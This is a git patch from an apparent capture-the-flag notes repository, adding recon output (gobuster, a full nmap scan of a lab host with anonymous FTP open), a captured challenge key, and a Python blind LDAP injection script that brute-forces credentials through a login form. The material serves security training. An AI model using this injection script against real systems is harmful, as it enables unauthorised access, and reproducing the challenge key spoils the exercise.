From 1b6dfea090964ed54c7607f3ee5d57fbe547715c Mon Sep 17 00:00:00 2001 From: Curo Date: Mon, 8 Dec 2025 17:15:06 +0100 Subject: [PATCH] 2025-12-08 --- AoC/2025/07/gobuster.txt | 3 + AoC/2025/07/nmap_scan.txt | 104 +++++++++++++++++++++++++++++++++++ AoC/2025/07/tbfc_qa_key1 | 1 + Walkthroughs/LDAPi/script.py | 47 ++++++++++++++++ 4 files changed, 155 insertions(+) create mode 100644 AoC/2025/07/gobuster.txt create mode 100644 AoC/2025/07/nmap_scan.txt create mode 100644 AoC/2025/07/tbfc_qa_key1 create mode 100644 Walkthroughs/LDAPi/script.py diff --git a/AoC/2025/07/gobuster.txt b/AoC/2025/07/gobuster.txt new file mode 100644 index 0000000..f589385 --- /dev/null +++ b/AoC/2025/07/gobuster.txt @@ -0,0 +1,3 @@ +/terminal  (Status: 302) [Size: 201] [--> /unlock] +/unlock  (Status: 200) [Size: 1257] +/tty  (Status: 301) [Size: 162] [--> http://10.82.133.11/tty/] diff --git a/AoC/2025/07/nmap_scan.txt b/AoC/2025/07/nmap_scan.txt new file mode 100644 index 0000000..a96538c --- /dev/null +++ b/AoC/2025/07/nmap_scan.txt @@ -0,0 +1,104 @@ +# Nmap 7.95 scan initiated Mon Dec 8 07:47:46 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan.txt 10.82.133.11 +Nmap scan report for 10.82.133.11 +Host is up (0.042s latency). +Not shown: 65531 filtered tcp ports (no-response) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0) +80/tcp open http nginx +|_http-title: TBFC QA \xE2\x80\x94 EAST-mas +21212/tcp open ftp vsftpd 3.0.5 +| ftp-syst: +| STAT: +| FTP server status: +| Connected to 192.168.156.241 +| Logged in as ftp +| TYPE: ASCII +| No session bandwidth limit +| Session timeout in seconds is 300 +| Control connection is plain text +| Data connections will be plain text +| At session startup, client count was 3 +| vsFTPd 3.0.5 - secure, fast, stable +|_End of status +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_Can't get directory listing: TIMEOUT +25251/tcp open unknown +| fingerprint-strings: +| DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPBindReq, NULL, RPCCheck, SMBProgNeg, X11Probe: +| TBFC maintd v0.2 +| Type HELP for commands. +| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, LDAPSearchReq, RTSPRequest: +| TBFC maintd v0.2 +| Type HELP for commands. +| unknown command +| unknown command +| Help: +| TBFC maintd v0.2 +| Type HELP for commands. +| Commands: HELP, STATUS, GET KEY, QUIT +| Kerberos, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: +| TBFC maintd v0.2 +| Type HELP for commands. +| unknown command +| SIPOptions: +| TBFC maintd v0.2 +| Type HELP for commands. +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +|_ unknown command +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port25251-TCP:V=7.95%I=7%D=12/8%Time=693674F2%P=aarch64-unknown-linux-g +SF:nu%r(NULL,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\ +SF:.\n")%r(GenericLines,49,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x +SF:20commands\.\nunknown\x20command\nunknown\x20command\n")%r(GetRequest,4 +SF:9,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\ +SF:x20command\nunknown\x20command\n")%r(HTTPOptions,49,"TBFC\x20maintd\x20 +SF:v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x +SF:20command\n")%r(RTSPRequest,49,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x +SF:20for\x20commands\.\nunknown\x20command\nunknown\x20command\n")%r(RPCCh +SF:eck,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\n")% +SF:r(DNSVersionBindReqTCP,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for +SF:\x20commands\.\n")%r(DNSStatusRequestTCP,29,"TBFC\x20maintd\x20v0\.2\nT +SF:ype\x20HELP\x20for\x20commands\.\n")%r(Help,4F,"TBFC\x20maintd\x20v0\.2 +SF:\nType\x20HELP\x20for\x20commands\.\nCommands:\x20HELP,\x20STATUS,\x20G +SF:ET\x20KEY,\x20QUIT\n")%r(SSLSessionReq,39,"TBFC\x20maintd\x20v0\.2\nTyp +SF:e\x20HELP\x20for\x20commands\.\nunknown\x20command\n")%r(TerminalServer +SF:Cookie,39,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\n +SF:unknown\x20command\n")%r(TLSSessionReq,39,"TBFC\x20maintd\x20v0\.2\nTyp +SF:e\x20HELP\x20for\x20commands\.\nunknown\x20command\n")%r(Kerberos,39,"T +SF:BFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20c +SF:ommand\n")%r(SMBProgNeg,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20fo +SF:r\x20commands\.\n")%r(X11Probe,29,"TBFC\x20maintd\x20v0\.2\nType\x20HEL +SF:P\x20for\x20commands\.\n")%r(FourOhFourRequest,49,"TBFC\x20maintd\x20v0 +SF:\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x20 +SF:command\n")%r(LPDString,39,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20fo +SF:r\x20commands\.\nunknown\x20command\n")%r(LDAPSearchReq,49,"TBFC\x20mai +SF:ntd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nun +SF:known\x20command\n")%r(LDAPBindReq,29,"TBFC\x20maintd\x20v0\.2\nType\x2 +SF:0HELP\x20for\x20commands\.\n")%r(SIPOptions,D9,"TBFC\x20maintd\x20v0\.2 +SF:\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x20com +SF:mand\nunknown\x20command\nunknown\x20command\nunknown\x20command\nunkno +SF:wn\x20command\nunknown\x20command\nunknown\x20command\nunknown\x20comma +SF:nd\nunknown\x20command\nunknown\x20command\n"); +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Aggressive OS guesses: Linux 5.18 (96%), Linux 5.4 (94%), Cisco Unified Communications Manager VoIP adapter (92%), Linux 2.6.26 (92%), Linux 2.6.18 (89%), Android TV OS 11 (Linux 4.19) (88%), Android 7.1.2 (Linux 3.10) (88%), IPFire 2.25 firewall (Linux 4.14) (88%), IPFire 2.27 (Linux 5.15 - 6.1) (88%), Linux 2.6.32 (88%) +No exact OS matches for host (test conditions non-ideal). +Network Distance: 3 hops +Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 42.07 ms 192.168.128.1 +2 ... +3 42.69 ms 10.82.133.11 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Mon Dec 8 07:52:34 2025 -- 1 IP address (1 host up) scanned in 288.40 seconds diff --git a/AoC/2025/07/tbfc_qa_key1 b/AoC/2025/07/tbfc_qa_key1 new file mode 100644 index 0000000..36a2b10 --- /dev/null +++ b/AoC/2025/07/tbfc_qa_key1 @@ -0,0 +1 @@ +KEY1:3aster_ diff --git a/Walkthroughs/LDAPi/script.py b/Walkthroughs/LDAPi/script.py new file mode 100644 index 0000000..98f257b --- /dev/null +++ b/Walkthroughs/LDAPi/script.py @@ -0,0 +1,47 @@ +import requests +from bs4 import BeautifulSoup +import string +import time + +# Base URL +url = 'http://10.82.144.176/blind.php' + +# Define the character set +char_set = string.ascii_lowercase + string.ascii_uppercase + string.digits + "._!@#$%^&*()" + +# Initialize variables +successful_response_found = True +successful_chars = '' + +headers = { + 'Content-Type': 'application/x-www-form-urlencoded' +} + +while successful_response_found: + successful_response_found = False + + for char in char_set: + #print(f"Trying password character: {char}") + + # Adjust data to target the password field + data = {'username': f'{successful_chars}{char}*)(|(&','password': 'pwd)'} + + # Send POST request with headers + response = requests.post(url, data=data, headers=headers) + + # Parse HTML content + soup = BeautifulSoup(response.content, 'html.parser') + + # Adjust success criteria as needed + paragraphs = soup.find_all('p', style='color: green;') + + if paragraphs: + successful_response_found = True + successful_chars += char + print(f"Successful character found: {char}") + break + + if not successful_response_found: + print("No successful character found in this iteration.") + +print(f"Final successful payload: {successful_chars}")